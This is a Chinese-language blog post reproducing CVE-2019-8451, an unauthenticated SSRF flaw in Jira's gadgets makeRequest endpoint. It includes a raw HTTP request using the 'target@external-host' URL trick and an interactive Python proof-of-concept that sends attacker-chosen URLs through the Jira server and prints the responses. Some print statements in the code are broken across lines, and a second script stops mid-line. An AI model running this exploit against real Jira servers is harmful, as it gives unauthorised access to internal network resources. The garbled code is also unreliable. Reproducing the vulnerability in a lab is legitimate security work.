您的位置: 首页  >  IT文章  >  Jira未授权SSRF漏洞复现(CVE-2019-8451)

Jira未授权SSRF漏洞复现(CVE-2019-8451)

分类: IT文章 2024-05-21 21:27:18

0x00 漏洞背景

Jira的/plugins/servlet/gadgets/makeRequest资源存在SSRF漏洞,原因在于JiraWhitelist这个类的逻辑缺陷,成功利用此漏洞的远程攻击者可以以Jira服务端的身份访问内网资源。经分析,此漏洞无需任何凭据即可触发。

Jira未授权SSRF漏洞复现(CVE-2019-8451)

Jira未授权SSRF漏洞复现(CVE-2019-8451)

0x01 影响范围

< 8.4.0

此漏洞是在Jira服务器7.6.0版中引入的,并在7.13.9和8.4.0版中进行了修复

0x02 漏洞复现

Atlassian JIRAv7.13.0 (以该版本为例,该版本存在漏洞)下载地址:

https://product-downloads.atlassian.com/software/jira/downloads/atlassian-jira-software-7.13.0-x64.exe 

安装过程不再描述(按照提示进行安装,先在官方注册一个账号然后拿到一个试用期序列号并进行安装)。

通过bupsuit进行请求如下,在响应中可以看到成功探测目标系统存在ssrf漏洞:

GET /plugins/servlet/gadgets/makeRequest?url=http://10.206.1.8:8080@www.baidu.com HTTP/1.1
Host: 10.206.1.8:8080
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchangeb;v=b3
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
X-Atlassian-Token: no-check
Connection: close
Jira未授权SSRF漏洞复现(CVE-2019-8451)

Jira未授权SSRF漏洞复现(CVE-2019-8451)

0x03 漏洞验证

其验证POC如下:
import requests
import sys
# http://http://10.206.1.8:8080/plugins/servlet/gadgets/makeRequest?url=http://10.206.1.8:8080@www.baidu.com/

def ssrf_poc(url, ssrf_url):
    if url[-1] == '/':
        url = url[:-1]
    else:
        url = url

    vuln_url = url + "/plugins/servlet/gadgets/makeRequest?url=" + url + '@' + ssrf_url

    headers = {
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0",
    "Accept": "*/*",
    "Accept-Language": "zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3",
    "Accept-Encoding": "gzip, deflate",
    "X-Atlassian-Token": "no-check",
    "Connection": "close"
    }

    r = requests.get(url=vuln_url, headers=headers)
    if r.status_code == 200 and 'set-cookie' in r.content:
        print "
>>>>Send poc Success!
"
        print 'X-AUSERNAME= %s' % r.headers.get('X-AUSERNAME')
        print "
>>>>vuln_url= " + vuln_url + '
'
        print r.content
    else:
        print "No Vuln Exit!"


if __name__ == "__main__":
    
    while True:
        print
        ssrf_url = raw_input(">>>>SSRF URL: ")
        url = "http://10.206.1.8:8080" #需要修改成自己的目标jira系统
        ssrf_poc(url, ssrf_url)
python CVE-2019-8451.py http://10.206.1.8:8080/
Jira未授权SSRF漏洞复现(CVE-2019-8451)
Jira未授权SSRF漏洞复现(CVE-2019-8451)
或者:
#!/usr/bin/env python3
import argparse
import requests
import re

G, B, R, W, M, C, end = '

相关推荐